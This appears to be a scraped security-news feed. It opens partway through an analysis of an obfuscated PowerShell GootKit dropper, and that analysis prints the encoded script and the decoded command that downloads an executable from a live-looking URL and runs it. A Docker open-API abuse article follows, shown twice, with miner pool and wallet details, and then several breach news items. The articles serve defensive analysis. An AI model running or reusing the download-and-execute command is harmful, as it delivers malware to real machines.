Replacing these variable names with some more readable and meaningful characters makes the script easier to analyze:

  1. ( ‘…..’|%{$var1 =+ $()}{ $var2=$var1} { $var3 = ++$var1}{ $var4=($var1 =$var1 +$var3)}{$var5 =($var1= $var1 + $var3 )}{$var6=( $var1=$var1+$var3 )} { $var7 =($var1 =$var1+ $var3) }{ $var8 = ( $var1=$var1 + $var3) } {$var9= ( $var1=$var1+$var3)} {$var10 = ( $var1 =$var1 +$var3 ) } { $var11= ( $var1= $var1+ $var3 )} { $var12 =“[“ +“$(@{ } ) “[$var9 ] + “$(@{})”[ “$var3” +“$var11” ]+ “$(@{ })”[“$var4”+“$var2”]+“$? “[$var3 ]+“]” }{$var1 = “”.(“$( @{} )”[ “$var3$var6” ]+“$(@{ }) “[“$var3$var8”] + “$( @{ } ) “[ $var2]+ “$(@{} ) “[ $var6]+ “$?”[$var3] + “$( @{ } ) “[$var5 ])}{$var1 =“$( @{} ) “[ “$var3$var6”] + “$( @{ } )”[$var6] +“$var1”[ “$var4$var9”]} );
  2. .$var1 (“$var1 ($var12$var3$var2$var7 + $var12$var3$var2$var4 +$var12$var6$var2+ $var12$var5$var8+$var12$var3$var2$var6 +$var12$var3$var3$var3 +$var12$var3$var3$var7+ $var12$var3$var3$var8 +$var12$var6$var8+$var12$var3$var3$var10+$var12$var3$var2$var3+$var12$var3$var3$var6+$var12$var3$var3$var7+$var12$var3$var2$var7+$var12$var3$var3$var3+ $var12$var3$var3$var2+$var12$var6$var8+ $var12$var3$var2$var11 + $var12$var11$var9+ $var12$var3$var2$var8+ $var12$var3$var3$var3 +$var12$var3$var3$var6+ $var12$var5$var4+$var12$var6$var7+ $var12$var3$var2$var10 + $var12$var3$var3$var8+ $var12$var5$var4 +$var12$var7$var3 + $var12$var6$var3+ $var12$var3$var4$var5 + $var12$var9$var5+ $var12$var3$var2$var11+ $var12$var3$var3$var4+ $var12$var3$var3$var3 + $var12$var3$var3$var6+$var12$var3$var3$var8+ $var12$var6$var7+$var12$var9$var9+ $var12$var3$var3$var3+$var12$var3$var2$var2+ $var12$var3$var3$var9+$var12$var3$var2$var10 +$var12$var3$var2$var3+$var12$var5$var4 +$var12$var8$var8+$var12$var3$var2$var7+ $var12$var3$var3$var8+$var12$var3$var3$var7+$var12$var10$var6 +$var12$var3$var3$var6+ $var12$var11$var9 +$var12$var3$var3$var2+$var12$var3$var3$var7+ $var12$var3$var2$var4 + $var12$var3$var2$var3 +$var12$var3$var3$var6 + $var12$var3$var4$var7+$var12$var5$var4 +$var12$var10$var5 + $var12$var3$var3$var8 + $var12$var11$var9+ $var12$var3$var3$var6 +$var12$var3$var3$var8 + $var12$var6$var7 + $var12$var8$var8 + $var12$var3$var2$var7+$var12$var3$var3$var8 + $var12$var3$var3$var7+$var12$var10$var6 +$var12$var3$var3$var6 +$var12$var11$var9 +$var12$var3$var3$var2+ $var12$var3$var3$var7+$var12$var3$var2$var4 +$var12$var3$var2$var3 + $var12$var3$var3$var6 + $var12$var5$var4+$var12$var6$var7+ $var12$var10$var5+ $var12$var3$var3$var3+ $var12$var3$var3$var9 + $var12$var3$var3$var6+ $var12$var11$var11+$var12$var3$var2$var3 + $var12$var5$var4+ $var12$var3$var2$var6+ $var12$var3$var3$var8+ $var12$var3$var3$var8 + $var12$var3$var3$var4 +$var12$var3$var3$var7+$var12$var7$var10+ $var12$var6$var9+$var12$var6$var9+$var12$var3$var3$var4 +$var12$var3$var3$var6 + $var12$var3$var2$var3 + $var12$var3$var2$var2 + $var12$var3$var2$var7+$var12$var3$var3$var7+ $var12$var3$var3$var4 +$var12$var3$var3$var3 + $var12$var3$var3$var7+ $var12$var3$var3$var8+ $var12$var3$var3$var3 + $var12$var6$var8+$var12$var3$var2$var11+ $var12$var11$var9+$var12$var3$var3$var8 +$var12$var3$var3$var8 +$var12$var3$var3$var4+ $var12$var3$var3$var3 + $var12$var3$var2$var2+$var12$var3$var3$var7+ $var12$var11$var11+ $var12$var3$var2$var6+ $var12$var3$var3$var11 + $var12$var3$var2$var3+ $var12$var3$var2$var7 +$var12$var3$var3$var8 + $var12$var6$var8+ $var12$var11$var11 + $var12$var3$var3$var3 + $var12$var3$var2$var11+ $var12$var6$var9 + $var12$var11$var11+ $var12$var3$var3$var3+$var12$var3$var2$var11 +$var12$var3$var3$var9+ $var12$var3$var3$var2+$var12$var3$var2$var7 + $var12$var3$var3$var10 + $var12$var6$var9+$var12$var3$var2$var7+ $var12$var3$var3$var2 + $var12$var3$var3$var8+$var12$var3$var2$var3+ $var12$var3$var3$var6+$var12$var6$var8 + $var12$var3$var3$var4+ $var12$var3$var2$var6 +$var12$var3$var3$var4 + $var12$var7$var7 +$var12$var5$var4+$var12$var6$var7+$var12$var8$var10+ $var12$var3$var2$var3 +$var12$var3$var3$var7 +$var12$var3$var3$var8+$var12$var3$var2$var7+ $var12$var3$var3$var2+ $var12$var11$var9+ $var12$var3$var3$var8+$var12$var3$var2$var7+$var12$var3$var3$var3 + $var12$var3$var3$var2 +$var12$var5$var4 + $var12$var5$var8 + $var12$var3$var2$var3 +$var12$var3$var3$var2+ $var12$var3$var3$var10 + $var12$var7$var10 + $var12$var3$var3$var8 +$var12$var3$var2$var3+ $var12$var3$var2$var11+ $var12$var3$var3$var4 + $var12$var11$var4+$var12$var3$var2$var9+ $var12$var3$var3$var7 + $var12$var3$var2$var8 +$var12$var3$var4$var2+ $var12$var3$var2$var8 +$var12$var3$var2$var3+$var12$var3$var3$var11+ $var12$var3$var3$var9+ $var12$var3$var2$var6 + $var12$var3$var3$var9+ $var12$var3$var2$var9+$var12$var3$var2$var3 +$var12$var3$var3$var11+ $var12$var6$var8+$var12$var3$var2$var3 +$var12$var3$var4$var2+$var12$var3$var2$var3 + $var12$var7$var11+ $var12$var5$var4+ $var12$var10$var5 + $var12$var3$var3$var8+$var12$var11$var9+ $var12$var3$var3$var6 +$var12$var3$var3$var8 + $var12$var6$var7 +$var12$var10$var2+$var12$var3$var3$var6 +$var12$var3$var3$var3+ $var12$var11$var11+ $var12$var3$var2$var3 + $var12$var3$var3$var7 +$var12$var3$var3$var7 +$var12$var5$var4 +$var12$var5$var8 +$var12$var3$var2$var3+$var12$var3$var3$var2+ $var12$var3$var3$var10 +$var12$var7$var10 + $var12$var3$var3$var8 + $var12$var3$var2$var3 +$var12$var3$var2$var11 + $var12$var3$var3$var4 + $var12$var11$var4+ $var12$var3$var2$var9+ $var12$var3$var3$var7 + $var12$var3$var2$var8+$var12$var3$var4$var2+$var12$var3$var2$var8 +$var12$var3$var2$var3 +$var12$var3$var3$var11 +$var12$var3$var3$var9+ $var12$var3$var2$var6+ $var12$var3$var3$var9 +$var12$var3$var2$var9 + $var12$var3$var2$var3 + $var12$var3$var3$var11+$var12$var6$var8 +$var12$var3$var2$var3 + $var12$var3$var4$var2 + $var12$var3$var2$var3 )”)

The first instruction of the script sets the variable values to some fixed strings, derived from a series of wasteful concatenation operations:

  1. ( ‘…..’|%{$var1 =+ $()}{ $var2=$var1} { $var3 = ++$var1}{ $var4=($var1 =$var1 +$var3)}{$var5 =($var1= $var1 + $var3 )}{$var6=( $var1=$var1+$var3 )} { $var7 =($var1 =$var1+ $var3) }{ $var8 = ( $var1=$var1 + $var3) } {$var9= ( $var1=$var1+$var3)} {$var10 = ( $var1 =$var1 +$var3 ) } { $var11= ( $var1= $var1+ $var3 )} { $var12 =“[“ +“$(@{ } ) “[$var9 ] + “$(@{})”[ “$var3” +“$var11” ]+ “$(@{ })”[“$var4”+“$var2”]+“$? “[$var3 ]+“]” }{$var1 = “”.(“$( @{} )”[ “$var3$var6” ]+“$(@{ }) “[“$var3$var8”] + “$( @{ } ) “[ $var2]+ “$(@{} ) “[ $var6]+ “$?”[$var3] + “$( @{ } ) “[$var5 ])}{$var1 =“$( @{} ) “[ “$var3$var6”] + “$( @{ } )”[$var6] +“$var1”[ “$var4$var9”]} );

After the execution of this instruction, the values contained into the variables are:

  1. $var1 = “iex”
  2. $var2 = “0
  3. $var3 = “1
  4. $var4 = “2
  5. $var5 = “3
  6. $var6 = “4
  7. $var7 = “5
  8. $var8 = “6
  9. $var9 = “7
  10. $var10 = “8
  11. $var11 = “9
  12. $var12 = “[CHar]

The second piece of code concatenates the above values in order to compose a powershell command string. Each single character of the generated command is represented as ASCII decimal numbers leveraging the variables above as alphabet (i.e. “$var12$var3$var2$var7” becomes “[CHar]105”) . The decoding of the entire instruction results in:

  1. iex ([CHar]105 + [CHar]102 +[CHar]40+ [CHar]36+[CHar]104 +[CHar]111 +[CHar]115+ [CHar]116 +[CHar]46+[CHar]118+[CHar]101+[CHar]114+[CHar]115+[CHar]105+[CHar]111+ [CHar]110+[CHar]46+ [CHar]109 + [CHar]97+ [CHar]106+ [CHar]111 +[CHar]114+ [CHar]32+[CHar]45+ [CHar]108 + [CHar]116+ [CHar]32 +[CHar]51 + [CHar]41+ [CHar]123 + [CHar]73+ [CHar]109+ [CHar]112+ [CHar]111 + [CHar]114+[CHar]116+ [CHar]45+[CHar]77+ [CHar]111+[CHar]100+ [CHar]117+[CHar]108 +[CHar]101+[CHar]32 +[CHar]66+[CHar]105+ [CHar]116+[CHar]115+[CHar]84 +[CHar]114+ [CHar]97 +[CHar]110+[CHar]115+ [CHar]102 + [CHar]101 +[CHar]114 + [CHar]125+[CHar]32 +[CHar]83 + [CHar]116 + [CHar]97+ [CHar]114 +[CHar]116 + [CHar]45 + [CHar]66 + [CHar]105+[CHar]116 + [CHar]115+[CHar]84 +[CHar]114 +[CHar]97 +[CHar]110+ [CHar]115+[CHar]102 +[CHar]101 + [CHar]114 + [CHar]32+[CHar]45+ [CHar]83+ [CHar]111+ [CHar]117 + [CHar]114+ [CHar]99+[CHar]101 + [CHar]32+ [CHar]104+ [CHar]116+ [CHar]116 + [CHar]112 +[CHar]115+[CHar]58+ [CHar]47+[CHar]47+[CHar]112 +[CHar]114 + [CHar]101 + [CHar]100 + [CHar]105+[CHar]115+ [CHar]112 +[CHar]111 + [CHar]115+ [CHar]116+ [CHar]111 + [CHar]46+[CHar]109+ [CHar]97+[CHar]116 +[CHar]116 +[CHar]112+ [CHar]111 + [CHar]100+[CHar]115+ [CHar]99+ [CHar]104+ [CHar]119 + [CHar]101+ [CHar]105 +[CHar]116 + [CHar]46+ [CHar]99 + [CHar]111 + [CHar]109+ [CHar]47 + [CHar]99+ [CHar]111+[CHar]109 +[CHar]117+ [CHar]110+[CHar]105 + [CHar]118 + [CHar]47+[CHar]105+ [CHar]110 + [CHar]116+[CHar]101+ [CHar]114+[CHar]46 + [CHar]112+ [CHar]104 +[CHar]112 + [CHar]55 +[CHar]32+[CHar]45+[CHar]68+ [CHar]101 +[CHar]115 +[CHar]116+[CHar]105+ [CHar]110+ [CHar]97+ [CHar]116+[CHar]105+[CHar]111 + [CHar]110 +[CHar]32 + [CHar]36 + [CHar]101 +[CHar]110+ [CHar]118 + [CHar]58 + [CHar]116 +[CHar]101+ [CHar]109+ [CHar]112 + [CHar]92+[CHar]107+ [CHar]115 + [CHar]106 +[CHar]120+ [CHar]106 +[CHar]101+[CHar]119+ [CHar]117+ [CHar]104 + [CHar]117+ [CHar]107+[CHar]101 +[CHar]119+ [CHar]46+[CHar]101 +[CHar]120+[CHar]101 + [CHar]59+ [CHar]32+ [CHar]83 + [CHar]116+[CHar]97+ [CHar]114 +[CHar]116 + [CHar]45 +[CHar]80+[CHar]114 +[CHar]111+ [CHar]99+ [CHar]101 + [CHar]115 +[CHar]115 +[CHar]32 +[CHar]36 +[CHar]101+[CHar]110+ [CHar]118 +[CHar]58 + [CHar]116 + [CHar]101 +[CHar]109 + [CHar]112 + [CHar]92+ [CHar]107+ [CHar]115 + [CHar]106+[CHar]120+[CHar]106 +[CHar]101 +[CHar]119 +[CHar]117+ [CHar]104+ [CHar]117 +[CHar]107 + [CHar]101 + [CHar]119+[CHar]46 +[CHar]101 + [CHar]120 + [CHar]101 )

At this point, a simple ASCII to char conversion make possible to decode and recover the final powershell command, unveiling the code purpose. It imports the BitsTransfer cmdlet (Background Intelligent Transfer Service) and proceeds to download and execute the GootKit malware.

  1. if($host.version.major -lt 3){
  2. Import-Module BitsTransfer
  3. }
  4. Start-BitsTransfer -Source https://predisposto.mattpodschweit.com/comuniv/inter.php7 -Destination $env:temp\ksjxjewuhukew.exe;
  5. Start-Process $env:temp\ksjxjewuhukew.exe

 

Conclusion

The initial script, at a first impression, seems obfuscated using some sophisticated techniques. However, analyzing its actual code shows how the clever usage of simple tricks such as variable replacement or decimal encoding, is able to hide a clearly malicious Powershell script, making it nearly undetectable by common anti-malware engines.

This analysis and many others are available on the official blog of the Yoroi cyber security firm.

Dissecting the Mindscrew-Powershell Obfuscation

Pierluigi Paganini

(Security Affairs – Powershell , VBScript)

The post Dissecting the Mindscrew-Powershell Obfuscation appeared first on Security Affairs.

Security Affairs: Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers

Exploring the open API abuse for Docker Containers. Docker is a popular container product which has been adopted widely by the community.

Preface

IT industry has seen quite a few transformations in last couple of decades with advent of disruptive technologies. Back in 2000, every aspiring student wanted to become computer /IT engineer, thanks to “.com” boom that was storming the IT industry back in those days.  After a few years, IT industry disrupted big time again with the dawn of Virtualization.

Inception of Cloud technologies, in last few years, has completely changed the way we perceive and manage IT. Who would have thought 20 years back that all of the IT Infrastructure could be generated by just a few lines of code?

Recently, with the rise of DevOps, backed by these latest disruptive advancements, the IT industry once again getting redefined its way of working. Today, every organization in the industry is keen to embrace this Digital Transformation journey to leverage the benefits provided by DevOps by adopting it. DevOps practices are offering enormous capability of rapidly delivering products by reforming and automating the CI/CD pipeline. The DevOps practices make deployment way efficient and standardized by providing speed, consistency and scalability. The field of IT is again going through a big transformation and we all are a part of this journey. At the same time, the cyber security industry is also moving very quickly to keep pace with the technology disruptions. The ways & means of delivering effective cyber security have gone through radical changes in last 6 -7 years to ensure security in this dynamic environment. Meanwhile, the rise of DevOps has given a birth to DevSecOps to ensure security in CI/CD pipeline.

The use of containers has become prevalent with a rise of DevOps era. Containers are dynamic & ephemeral by nature. Anything which is ephemeral is hard to get visibility on and if it is not visible then it is hard to secure. Traditional security measures may or may not work effectively to secure such a dynamic infrastructure. There are several challenges related to container security; and there are commercial and opensource solutions in the market to handle these newborn challenges.

In this article, I am exploring the open API abuse for Docker Containers. Docker is a popular container product which has been adopted widely by the community. Docker has both community and enterprise editions. Docker comes with quite a few security features with it, however, misconfiguration by admins/users of the Dockers may leave them vulnerable and open to exploit.

Need of an API

By default, when the Docker is installed, API is not exposed to the outside world. It is only accessible through loopback interface of the container. Exposing API may be required to leverage the application like Portainer which is used to manage containers on that host or on the remote hosts.

How to open API in Docker for CentOS?

Opening of API may get slightly tricky based on the operating system that you are using. Please follow the following steps to open an API on CentOS 7, provided that the Docker engine is already installed.

Update the file:  /etc/systemd/system/docker.service.d/docker.conf with the following commands

[Service]
ExecStart=
ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock

Note: If directory or file is missing under /etc/systemd/system then create it manually.

Docker

Restart the docker service using systemd commands:

sudo systemctl daemon-reload
sudo systemctl restart docker

You can verify if the configuration is working as expected by calling

Ps –ef | grep docker

Docker

How to connect to open API?

Following Docker command is used to hook in to open API on the remote host. Just by nudging the API with a standard curl command you will get following information (see the screenshot).

Curl –s <remote_ip>:2375/2376 | jq

Docker

What can(not) we do with Open API?

Once we get the open API on a remote docker_host, all the docker commands can be run on the remote hosts.  Using Docker commands, all sorts of docker operations & management can be performed on the remote host for Dockers –  ranging from Information gathering about Docker host to pulling the cryptominer image and running it as a rogue container on the remote host.

I have created a demo set-up to demonstrate a few of these examples

I have expose API on one of the CentOS boxes –  10.113.12.119 – as per the steps mentioned in the above section. I will connect to this machine using this Open API on port 2375 (Docker).

Information Gathering

Docker

List the images stored on the machine

Docker

List all containers on the machineDocker

Run/Launch the container on the remote machine / Spwaning a shell via exec command

Docker

List running containers on the machine

Docker

Run any command with root privilege on any of the running containers

Docker

Pull any image from the public repository and run that as a container on the remote hostDocker

Docker

Open Docker API on the Internet

If you explore Shodan search engine for Open API then you find that more than 1000 hosts are having their Docker API exposed on the Internet.

Docker

I have pulled down sample approx. 500 hosts using Shodan API and done some analytics on these 500 hosts to know the spread pattern of these open APIs.

Docker

By looking at the chart above, we can say that, China & United States shares the large number of open Docker APIs.

The largest share of the Docker Engines in analyzed ~500 open APIs are: 18.06.1-ce.

Docker

Even if where SSL/TLS is enabled, a small portion of Docker APIs were supporting vulnerable and outdated

protocols like SSLv2, SSLv3

Are they already compromised?

Out of ~500 samples analyzed, 130+ are already compromised with the cryptominer. It has been observed that 130+ hosts are compromised and running with cryptominer containers at the time of this research.  A few of the hosts are running with multiple mining containers; moreover, the containers are dynamic in nature hence the data varies a bit everytime we scan the open APIs. However, it is consistently giving 140+ miner containers running during the scan of these ~500 vulnerable hosts.

Most of these hosts are compromised with popular monero cpu cryptominer. These rogue containers will eat up CPU cycles on the hosts where it is installed. Docker has made it too easy to start mining with the help of miner images uploaded on the Docker Image Repository – Hub.

Just need to pull down one of those images and run/start the container on the remote hosts.

Out of ~140 observed compromised hosts, ~110+ are running with the “kannix/monero-miner” image.

Docker

If you look at the image statistics on Docker image repository, this image is pulled over 10M times. This shows the popularity of this miner image.

There are other cryptominer images also used but in very small portion.

arayan/monero-miner

Docker

timonmat/xmr-stak-cpu

Docker

strm/xmrig

Docker

bitnn/alpine-xmrig

Docker

Kannix/monero-miner run with following arguments for all analyzed samples –

  • Algorithm – cryptonight-lite
  • Pool Used – pool.aeon.hashvault.pro:3333
  • User (wallet account) –WmthxKa4FVvSDA8fjyXiZJB3WWWFxumQJAZfRGmrMCaMCooq52sipimAYJM2NYNy34bJUX566wEBmEC2QmdmnVLh2GzgRy4F6
  • Password – phantompain
  • Donate-level – 1
  • Max-cpu-usage – 100

How to prevent such attacks?

To prevent such attacks, we need to secure DockerAPI, TLS needs to be enabled by specifying tlsverify flag and pointing dokcer’s tlscacert to a trusted CA certificate.

There is step-by-step process explained how to secure API is described in Security documentation. Please refer Protect the Docker daemon socket.

About the author: Kirtar Oza CISSP,CISA, MS

Edited by Pierluigi Paganini

(Security Affairs – cybersecurity, Hacking)

The post Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers appeared first on Security Affairs.



Security Affairs

Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers

Exploring the open API abuse for Docker Containers. Docker is a popular container product which has been adopted widely by the community.

Preface

IT industry has seen quite a few transformations in last couple of decades with advent of disruptive technologies. Back in 2000, every aspiring student wanted to become computer /IT engineer, thanks to “.com” boom that was storming the IT industry back in those days.  After a few years, IT industry disrupted big time again with the dawn of Virtualization.

Inception of Cloud technologies, in last few years, has completely changed the way we perceive and manage IT. Who would have thought 20 years back that all of the IT Infrastructure could be generated by just a few lines of code?

Recently, with the rise of DevOps, backed by these latest disruptive advancements, the IT industry once again getting redefined its way of working. Today, every organization in the industry is keen to embrace this Digital Transformation journey to leverage the benefits provided by DevOps by adopting it. DevOps practices are offering enormous capability of rapidly delivering products by reforming and automating the CI/CD pipeline. The DevOps practices make deployment way efficient and standardized by providing speed, consistency and scalability. The field of IT is again going through a big transformation and we all are a part of this journey. At the same time, the cyber security industry is also moving very quickly to keep pace with the technology disruptions. The ways & means of delivering effective cyber security have gone through radical changes in last 6 -7 years to ensure security in this dynamic environment. Meanwhile, the rise of DevOps has given a birth to DevSecOps to ensure security in CI/CD pipeline.

The use of containers has become prevalent with a rise of DevOps era. Containers are dynamic & ephemeral by nature. Anything which is ephemeral is hard to get visibility on and if it is not visible then it is hard to secure. Traditional security measures may or may not work effectively to secure such a dynamic infrastructure. There are several challenges related to container security; and there are commercial and opensource solutions in the market to handle these newborn challenges.

In this article, I am exploring the open API abuse for Docker Containers. Docker is a popular container product which has been adopted widely by the community. Docker has both community and enterprise editions. Docker comes with quite a few security features with it, however, misconfiguration by admins/users of the Dockers may leave them vulnerable and open to exploit.

Need of an API

By default, when the Docker is installed, API is not exposed to the outside world. It is only accessible through loopback interface of the container. Exposing API may be required to leverage the application like Portainer which is used to manage containers on that host or on the remote hosts.

How to open API in Docker for CentOS?

Opening of API may get slightly tricky based on the operating system that you are using. Please follow the following steps to open an API on CentOS 7, provided that the Docker engine is already installed.

Update the file:  /etc/systemd/system/docker.service.d/docker.conf with the following commands

[Service]
ExecStart=
ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock

Note: If directory or file is missing under /etc/systemd/system then create it manually.

Docker

Restart the docker service using systemd commands:

sudo systemctl daemon-reload
sudo systemctl restart docker

You can verify if the configuration is working as expected by calling

Ps –ef | grep docker

Docker

How to connect to open API?

Following Docker command is used to hook in to open API on the remote host. Just by nudging the API with a standard curl command you will get following information (see the screenshot).

Curl –s <remote_ip>:2375/2376 | jq

Docker

What can(not) we do with Open API?

Once we get the open API on a remote docker_host, all the docker commands can be run on the remote hosts.  Using Docker commands, all sorts of docker operations & management can be performed on the remote host for Dockers –  ranging from Information gathering about Docker host to pulling the cryptominer image and running it as a rogue container on the remote host.

I have created a demo set-up to demonstrate a few of these examples

I have expose API on one of the CentOS boxes –  10.113.12.119 – as per the steps mentioned in the above section. I will connect to this machine using this Open API on port 2375 (Docker).

Information Gathering

Docker

List the images stored on the machine

Docker

List all containers on the machineDocker

Run/Launch the container on the remote machine / Spwaning a shell via exec command

Docker

List running containers on the machine

Docker

Run any command with root privilege on any of the running containers

Docker

Pull any image from the public repository and run that as a container on the remote hostDocker

Docker

Open Docker API on the Internet

If you explore Shodan search engine for Open API then you find that more than 1000 hosts are having their Docker API exposed on the Internet.

Docker

I have pulled down sample approx. 500 hosts using Shodan API and done some analytics on these 500 hosts to know the spread pattern of these open APIs.

Docker

By looking at the chart above, we can say that, China & United States shares the large number of open Docker APIs.

The largest share of the Docker Engines in analyzed ~500 open APIs are: 18.06.1-ce.

Docker

Even if where SSL/TLS is enabled, a small portion of Docker APIs were supporting vulnerable and outdated

protocols like SSLv2, SSLv3

Are they already compromised?

Out of ~500 samples analyzed, 130+ are already compromised with the cryptominer. It has been observed that 130+ hosts are compromised and running with cryptominer containers at the time of this research.  A few of the hosts are running with multiple mining containers; moreover, the containers are dynamic in nature hence the data varies a bit everytime we scan the open APIs. However, it is consistently giving 140+ miner containers running during the scan of these ~500 vulnerable hosts.

Most of these hosts are compromised with popular monero cpu cryptominer. These rogue containers will eat up CPU cycles on the hosts where it is installed. Docker has made it too easy to start mining with the help of miner images uploaded on the Docker Image Repository – Hub.

Just need to pull down one of those images and run/start the container on the remote hosts.

Out of ~140 observed compromised hosts, ~110+ are running with the “kannix/monero-miner” image.

Docker

If you look at the image statistics on Docker image repository, this image is pulled over 10M times. This shows the popularity of this miner image.

There are other cryptominer images also used but in very small portion.

arayan/monero-miner

Docker

timonmat/xmr-stak-cpu

Docker

strm/xmrig

Docker

bitnn/alpine-xmrig

Docker

Kannix/monero-miner run with following arguments for all analyzed samples –

  • Algorithm – cryptonight-lite
  • Pool Used – pool.aeon.hashvault.pro:3333
  • User (wallet account) –WmthxKa4FVvSDA8fjyXiZJB3WWWFxumQJAZfRGmrMCaMCooq52sipimAYJM2NYNy34bJUX566wEBmEC2QmdmnVLh2GzgRy4F6
  • Password – phantompain
  • Donate-level – 1
  • Max-cpu-usage – 100

How to prevent such attacks?

To prevent such attacks, we need to secure DockerAPI, TLS needs to be enabled by specifying tlsverify flag and pointing dokcer’s tlscacert to a trusted CA certificate.

There is step-by-step process explained how to secure API is described in Security documentation. Please refer Protect the Docker daemon socket.

About the author: Kirtar Oza CISSP,CISA, MS

Edited by Pierluigi Paganini

(Security Affairs – cybersecurity, Hacking)

The post Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers appeared first on Security Affairs.

Dell resets all customer passwords after security breach

By Waqas

The computer technology giant Dell has announced on Wednesday that it has suffered a potential security breach in which hackers attempted to steal customer data from its website Dell.com. The incident took place on November 9th when Dell detected and disrupted an attack aimed at the personal data of its customers including names, email addresses, and […]

This is a post from HackRead.com Read the original post: Dell resets all customer passwords after security breach

Dell data breach – Dell forces password reset after the incident

Dell data breach – IT giant Dell disclosed a data breach, the company confirmed it has detected an intrusion in its systems on November 9th 2018.

Attackers were trying to exfiltrate customer data (i.e. names, email addresses, and hashed passwords) from the company portal Dell.com, from support.dell.com websites.

Wednesday that its online electronics marketplace experienced a “cybersecurity incident” earlier this month when an unknown group of hackers infiltrated its internal network.

As a precautionary measure, Dell forced reset passwords for all accounts on Dell.com website, the company also announced additional measures to mitigate potential effects of the incident.

At the time it is still unclear if hackers succeeded in stealing customer information, the investigation is still ongoing and Dell hasn’t shared any technical details on the intrusion.  Dell hired a digital forensics firm to conduct an investigation and reported the incident to law enforcement.

“On November 9, 2018, Dell detected and disrupted unauthorized activity on our network that attempted to extract Dell.com customer information, limited to names, email addresses and hashed passwords,” read the data breach notification published by Dell.

“Upon detection, we immediately implemented countermeasures and began an investigation. We also retained a digital forensics firm to conduct an independent investigation and engaged law enforcement.”

The tech firm confirmed that payment information and Social Security numbers were not exposed due to the security breach.

“Credit card and other sensitive customer information was not targeted. The incident did not impact any Dell products or services.” continues Dell.

Upon detection of the attempted extraction, Dell immediately implemented countermeasures and initiated an investigation.” 

Customers having a Dell account or that contacted the online support can find more information on a dedicated web page Dell established at www.dell.com/customerupdate.

Customers need to change passwords for any other account on other services if they use the same password for their Dell.com account.

Pierluigi Paganini

(Security Affairs – Dell data breach, hacking)

The post Dell data breach – Dell forces password reset after the incident appeared first on Security Affairs.

FBI & Google shut down largest-ever Ad fraud scheme ‘3VE’

By Waqas

8 suspects behind 3VE have also been identified. Last year in August, the Federal Bureau of Investigation organized a secret meet-up between cybersecurity and digital advertising experts in its Manhattan federal building. This included Google and nearly 20 tech firms while there were nearly 30 attendees at the meeting. The agenda of the meeting was to […]

This is a post from HackRead.com Read the original post: FBI & Google shut down largest-ever Ad fraud scheme ‘3VE’

British MP: Facebook was aware about Russian activity at least since 2014

A British MP claims Facebook was ware about Russian political interference in 2014, long before the events become public.

The British MP Damian Collins, head of a parliamentary inquiry into disinformation, revealed that one of the emails seized from US software company Six4Three as part of a US lawsuit, demonstrates that a Facebook engineer had notified the social network giant in October 2014 that Russian IP addresses were accessing “three billion data points a day” on the network.

“British MPs joined together with fellow lawmakers from the parliaments of Argentina, Brazil, Canada, France, Ireland, Latvia and Singapore in an unusual move aimed at emphasising international solidarity on the issue.reported AFP press.

The information was shared during an international hearing that parliament hosted on Tuesday to gather info into disinformation and “fake news.”

The emails confirmed that Facebook was aware of the activities carried out by Russian threat actors in 2014 when they accessed a huge amount of data from the social media company.

“If Russian IP addresses were pulling down a huge amount of data from the platform was that reported or was that just kept, as so often seems to be the case, within the family and not talked about,” Collins asked Richard Allan, Facebook’s Vice President of Policy Solutions.

Richard Allan, Facebook’s Vice President of Policy Solutions, that represents the company replied that information could be used to provide a distorted interpretation of events.

“Any information you have seen… is at best partial and at worst potentially misleading” replied Allan. The emails were “unverified partial accounts”.

Allan also defended Facebook CEO Mark Zuckerberg, who has refused to appear before the British parliamentary inquiry.

Since the disclosure of the Cambridge Analytica privacy scandal and the alleged interference in the 2016 Presidential election, Facebook data protection policies were questioned by intelligence analysts and privacy advocates.

“While we were playing with our phones and apps, our democratic institutions… seem to have been upended by fratboy billionaires in California”. Charlie Angus from Canada’s House of Commons told Allan.

Catherine Morin-Desailly from the French Senate classified the Facebook data protection approach as “a scandal”, other lawmakers condemned the way Facebook shared user data with third-party companies.

Pierluigi Paganini

(Security Affairs – Facebook, fake news)

The post British MP: Facebook was aware about Russian activity at least since 2014 appeared first on Security Affairs.

Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach

British and Dutch data protection regulators fined the ride-sharing company Uber with $1,170,892 for the 2016 data breach.

British and Dutch data protection regulators have fined Uber with $1,170,892 for the 2016 security breach that exposed personal data of 57 million of its users.

In November 2017, the Uber CEO Dara Khosrowshahi announced that hackers broke into the company database and accessed the personal data (names, email addresses and cellphone numbers) of 57 million of its users, the disconcerting revelation was that the company covered up the hack for more than a year.

The attackers accessed also the names and driver’s license numbers of roughly 600,000 of its drivers in the United States.

The hack happened in 2016, it was easy for hackers that according to a report published by Bloomberg, obtained credentials from a private GitHub site used by the company development team. The hackers tried to blackmail Uber and demanded $100,000 from the company in exchange for avoiding publish the stolen data.

Rather than to notify the data breach to customers and law enforcement as is required by California’s data security breach notification law, the chief of information security Joe Sullivan ordered to pay the ransom and to cover the story destroying any evidence. The payout was disguised as a bug bounty prize complete with non-disclosure agreements signed.

Now Britain’s Information Commissioner’s Office (ICO) fined Uber 385,000 pounds ($491,102) for failing to protect the personal information of 3 million Britons.

“The Information Commissioner’s Office (ICO) has fined ride sharing company Uber £385,000 for failing to protect customers’ personal information during a cyber attack.

A series of avoidable data security flaws allowed the personal details of around 2.7million UK customers to be accessed and downloaded by attackers from a cloud-based storage system operated by Uber’s US parent company. This included full names, email addresses and phone numbers.” states the ICO.

“The records of almost 82,000 drivers based in the UK – which included details of journeys made and how much they were paid – were also taken during the incident in October and November 2016.”

ICO Director of Investigations Steve Eckersley declared:

“This was not only a serious failure of data security on Uber’s part, but a complete disregard for the customers and drivers whose personal information was stolen. At the time, no steps were taken to inform anyone affected by the breach, or to offer help and support. That left them vulnerable.”

“Paying the attackers and then keeping quiet about it afterwards was not, in our view, an appropriate response to the cyber attack.”

“Although there was no legal duty to report data breaches under the old legislation, Uber’s poor data protection practices and subsequent decisions and conduct were likely to have compounded the distress of those affected.”

The UK ICO confirmed that none of the affected customers were notified of the security breach.

